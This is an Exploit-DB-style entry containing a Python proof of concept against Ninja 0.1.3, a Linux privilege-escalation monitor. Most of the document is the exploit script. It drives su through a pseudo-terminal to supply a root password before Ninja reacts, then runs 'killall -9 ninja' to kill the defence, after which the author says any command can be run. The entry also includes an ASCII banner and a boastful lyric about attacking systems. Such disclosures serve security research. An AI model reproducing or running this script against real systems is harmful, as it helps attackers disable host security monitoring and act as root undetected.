Ninja Privilege Escalation Detection and Prevention System 0.1.3 – Race Condition Privilege Escalation

  • 作者: Ben Sheppard
    日期: 2015-04-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36855/
  • #[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg

#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ

import pty, os, sys, subprocess
pid, fd = pty.fork()

#begin config
user = "root"
password= "mypassword" #change this :)
command = "killall -9 ninja"
#end config


def usage():
	print """
@@@@@@@@@ @@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@
@@!@@@@@!!@@@@!@@@ @@!@@!@@@!@@ @@!!@@
!@!@!@!@!!@!!@!@!@ !@!!@!@!@!@! !@!@!!
@!@!@!@!!!@!@! @!@!@@!@!@!@! !!@@!@!@!@!!@! @!@@!@! 
!!!@!!!!!!!!!! !!@!!!!!@!!!! !!!!!!@!!!!!!! !!@!!!
!!:!!!!!::!! !!:!!:!!! !!:!!:!!!:!! !!: :!! 
:!:!:!:!::!: !:::!:!:!!!::!::!:!:!:!: :!:!:!
:: ::: :: ::: :::::: :::::: : :::: ::: ::: ::: :::::
 : : :: :: :: :: : : : ::: : : : :: :: : : ::: 
 
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
 
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
 """
 

executions = 0
def check_procs():
	p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
	p2 = subprocess.Popen(["grep", "root"],stdin=p1.stdout,stdout=subprocess.PIPE)
	p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
	output = p3.communicate()[0]
	if output != "":
		if executions != 0:
			sys.exit(0)
		return True
	else:
		return False

def kill_ninja():
	if pid == 0:
		os.execvp("su", ["su", user, "-c", command])
	elif pid > 0:
		try:
			os.read(fd, 1024)
			os.write(fd, password + "\n")
			os.read(fd,1024)
			os.wait()
			os.close(fd)
		except:
			usage()
			print "[+] Ninja is terminated"
			sys.exit(0)
			

while True:
	kill_ninja()
	if (check_procs == True):
		executions = executions + 1
		kill_ninja()
    Bash